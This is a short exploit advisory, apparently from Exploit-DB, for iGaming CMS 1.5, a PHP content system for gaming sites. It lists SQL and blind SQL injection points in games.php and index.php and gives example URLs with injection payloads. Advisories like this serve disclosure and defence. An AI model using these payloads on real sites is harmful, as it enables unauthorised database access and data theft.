iGaming CMS - Multiple SQL Injections

EDB-ID:

14820


Author:

Sweet

Type:

webapps


Platform:

PHP

Date:

2010-08-27


############################################################################
#                                                                          #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities                    #
#                                                                          #
# Date: 27/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : charif38@hotmail.fr                                            #
#                                                                          #
# Software Link: http://www.igamingcms.com/                                #
#                                                                          # 
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5              #
#                                                                          # 
# Version:1.5                                                              #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : hight                                                             #
#                                                                          #
#                                                                          #
# Description : iGaming CMS is a content management                        #
#         system designed for gaming websites.                             # 
#                                                                          #
#                                                                          #
#                                                                          #
############################################################################

1-SQL injection:

http://www.example.com/igamingpath/games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc

2-Blind injection:

http://www.example.com/igamingpath/games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc

http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0


thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com

Saha Ftourkoum et 1,2,3 viva L'Algerie :))